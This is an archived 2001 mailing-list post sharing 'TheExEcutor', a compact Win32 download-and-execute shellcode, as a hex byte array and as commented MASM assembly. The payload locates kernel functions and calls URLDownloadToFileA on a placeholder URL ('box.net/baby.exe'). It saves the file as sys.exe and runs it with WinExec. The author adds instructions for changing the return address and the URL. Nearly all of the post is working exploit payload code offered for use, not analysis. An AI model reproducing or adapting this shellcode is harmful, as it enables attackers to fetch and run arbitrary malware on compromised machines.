TheExEcutor Class A v1.0 - Special Win32 Shellcode

From: Enrique A. Compań Gzz. (enrique@virtekweb.net)
Date: 09/08/01 

Message-ID: <001001c138a6$44de7200$ab06050a@none>
From: "Enrique A. Compań Gzz." <enrique@virtekweb.net>
To: <vuln-dev@securityfocus.com>
Subject: TheExEcutor Class A v1.0 - Special Win32 Shellcode
Date: Sat, 8 Sep 2001 15:38:24 -0500

This is the 1st version of my download & execute code... it searches the
EXPORT table of KERNEL32
at a given KERNEL BASE.

This code is the smallest I've seen on its class... less than 300 bytes

Can be even smaller? yes... Can be more optimized? yes... That will be done
in future releases.

The Class B of this shellcode will search for the functions in the
**IMPORT** table at a given
base.... for example, inetinfo.exe base is 1000000h, by looking at the
import table there, you will
never fail executing the shellcode, you'll get always the correct addresses
=)....
Also compression & polymorphism will be implemented.

I created an exploit that uses classB.... has never failed. (scary)

Attached to this message: The ASM code and a VC++ file to test the
shellcode.............

Note: you have to change the C++ file... put another EIP. the one i'm using
is at shell 32 (call esp or jmp esp)...
I'm using W2k sp1. Also, change the scode and include the url you want.

unsigned char TheExEcutor[293] = {
    0xEB, 0x67, 0x5E, 0x8B, 0xEC, 0x8B, 0x06, 0x66, 0x33, 0xC0, 0x8B, 0xD8,
0x03, 0x40, 0x3C, 0x8B,
    0x40, 0x78, 0x03, 0xC3, 0x8B, 0x78, 0x20, 0x8D, 0x3C, 0x3B, 0x03, 0x1F,
0x33, 0xD2, 0x33, 0xC9,
    0x43, 0x38, 0x13, 0x75, 0x01, 0x41, 0x81, 0x3B, 0x47, 0x65, 0x74, 0x50,
0x75, 0x0B, 0x81, 0x7B,
    0x04, 0x72, 0x6F, 0x63, 0x41, 0x75, 0x02, 0x74, 0x02, 0xEB, 0xE5, 0x50,
0x41, 0x33, 0xC0, 0xB0,
    0x04, 0xF7, 0xE1, 0x8B, 0xC8, 0x58, 0x03, 0xC1, 0x83, 0xC0, 0x24, 0xFF,
0x76, 0x02, 0x66, 0xFF,
    0x30, 0x5B, 0x56, 0x83, 0xC6, 0x04, 0x46, 0x80, 0x3E, 0xFF, 0x75, 0x03,
0x80, 0x36, 0xFF, 0x81,
    0x3E, 0x4B, 0x49, 0x4B, 0x45, 0x75, 0xEF, 0xEB, 0x02, 0xEB, 0x4B, 0x5E,
0x8B, 0xE5, 0x8B, 0x06,
    0x66, 0x33, 0xC0, 0x50, 0x83, 0xC6, 0x04, 0x56, 0x50, 0xFF, 0xD3, 0x83,
0xC6, 0x0D, 0x56, 0xFF,
    0xD0, 0x83, 0xC6, 0x07, 0x56, 0x50, 0xFF, 0xD3, 0x33, 0xC9, 0x51, 0x51,
0x83, 0xC6, 0x13, 0x56,
    0x83, 0xC6, 0x1C, 0x56, 0x51, 0xFF, 0xD0, 0x58, 0x50, 0x83, 0xEE, 0x08,
0x56, 0x50, 0xFF, 0xD3,
    0x33, 0xC9, 0x51, 0x83, 0xEE, 0x14, 0x56, 0xFF, 0xD0, 0x58, 0x83, 0xC6,
0x08, 0x56, 0x50, 0xFF,
    0xD3, 0x33, 0xC9, 0x51, 0xFF, 0xD0, 0xE8, 0x47, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xE8, 0x77, 0x4C,
    0x6F, 0x61, 0x64, 0x4C, 0x69, 0x62, 0x72, 0x61, 0x72, 0x79, 0x41, 0xFF,
0x55, 0x52, 0x4C, 0x4D,
    0x4F, 0x4E, 0xFF, 0x55, 0x52, 0x4C, 0x44, 0x6F, 0x77, 0x6E, 0x6C, 0x6F,
0x61, 0x64, 0x54, 0x6F,
    0x46, 0x69, 0x6C, 0x65, 0x41, 0xFF, 0x73, 0x79, 0x73, 0x2E, 0x65, 0x78,
0x65, 0xFF, 0x45, 0x78,
    0x69, 0x74, 0x50, 0x72, 0x6F, 0x63, 0x65, 0x73, 0x73, 0xFF, 0x57, 0x69,
0x6E, 0x45, 0x78, 0x65,
    0x63, 0xFF, "http://box.net/baby.exe", 0xFF, 0x4B, 0x49, 0x4B, 0x45,
    } ;

  NOTE: SUBSTITUTE THE URL WITH THE ONE YOU WANT, IE. "0x68, 0x74, 0x74,
0x70...." (HTTP...)....

;
; "TheExEcutor" Class A v1.0 - Win32 Shellcode
;
; Copyright (c) 2001 by Enrique A. Compań Gzz.
;
; Virtek Labs
;
; http://www.virtekweb.net/labs
;
;
; Downloads & Executes a file. It searches for function addresses
; automatically by looking at the EXPORT table of Kernel32 with a
; default Kernel base of 78e80000h. You can change this.
;

.386
.model flat, stdcall

option casemap:none

include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib

.data

data db "blah"

.code

shell_code_start:

        jmp fix_long_jmp ;Jump to call back function

call_back:

        pop esi ;ESI = first var offset

real_code_start:

 mov ebp, esp ;Normalize the stack

 mov eax, [esi] ;eax = ptr to "MZ" (Kernel Base)
 xor ax, ax

 mov ebx, eax ;ebx = ptr to "MZ"
 add eax, [eax+3ch] ;eax = ptr to "PE"
 mov eax, [eax+78h] ;eax = export tables RVA
 add eax, ebx ;eax = ptr to export tables
 mov edi, [eax+20h] ;edi = names tables RVA
 lea edi, [edi+ebx] ;edi = names table ptr

; Ex table = 77ed5c20
; Names tables with RVAs of names = 77ed6f92

 add ebx, [edi]
 xor edx, edx
 xor ecx, ecx

search_function:

 inc ebx
 cmp [ebx], dl
 jne no_zero
 inc ecx
no_zero:
 cmp [ebx], DWORD PTR 'PteG'
 jne no_match
 cmp [ebx+4], DWORD PTR 'Acor'
        jne no_match
        je search_complete
no_match:
 jmp search_function

search_complete:

 push eax
 inc ecx
 xor eax, eax
 mov al, 4
 mul ecx
 mov ecx, eax
 pop eax
 add eax, ecx
 add eax, 024h
 push [esi+2]
 push word ptr [eax]
 pop ebx ;EBX = GetProcAddress address... finally!

; Decode the NULL chars

 push esi
        add esi, 4

decode_loop:
 inc esi
 cmp byte ptr [esi], 0ffh
 jne skip_xor
 xor byte ptr [esi], 0ffh
skip_xor:
 cmp [esi], dword ptr 'EKIK'
 jne decode_loop

;Trick to avoid Nulls in the first jmp instruction...

 jmp skip_fix_long_jmp ;Skipt the special jump
fix_long_jmp:
 jmp pi_offset ;Continue the jump to the call back function
skip_fix_long_jmp:

;Now we Download & Execute the file and terminate

 pop esi

 mov esp, ebp ;Normalize ESP

 mov eax, [esi] ;eax = ptr to "MZ" (Kernel Base)
 xor ax, ax

 push eax

 add esi, 4
 push esi
 push eax
        call ebx ;Call GetProcAddress

 add esi, 13
 push esi
 call eax ;Call LoadLibraryA

 add esi, 7
 push esi
 push eax
 call ebx ;Call GetProcAddress

 xor ecx, ecx
 push ecx
 push ecx
 add esi, 19
 push esi
 add esi, 28
 push esi
 push ecx ;Call URLDownloadToFileA
 call eax

 pop eax
 push eax
 sub esi, 8
 push esi
 push eax
 call ebx ;Call GetProcAddress

 xor ecx, ecx
 push ecx
 sub esi, 20
 push esi
 call eax ;Call WinExec

 pop eax
 add esi, 8
 push esi
 push eax
 call ebx ;Call GetProcAddress

xor ecx, ecx
push ecx
call eax ;Call ExitProcess

real_code_end:

pi_offset:
        call call_back ;Return and push the address of the vars

vars_start:

 db 0ffh,0ffh,0e8h,077h ;Specify the Kernel Base @ 77e80000h
 db "LoadLibraryA",0ffh
 db "URLMON",0ffh
 db "URLDownloadToFileA",0ffh
 db "sys.exe",0ffh
 db "ExitProcess", 0ffh
 db "WinExec",0ffh
 db "http://box.net/baby.exe",0ffh ;The URL: Be sure to end it
with 0ffh
db "***",0h ;Marker to know we
reached the END

end shell_code_start

--------------

Wooh... that was long...

See u....

Loading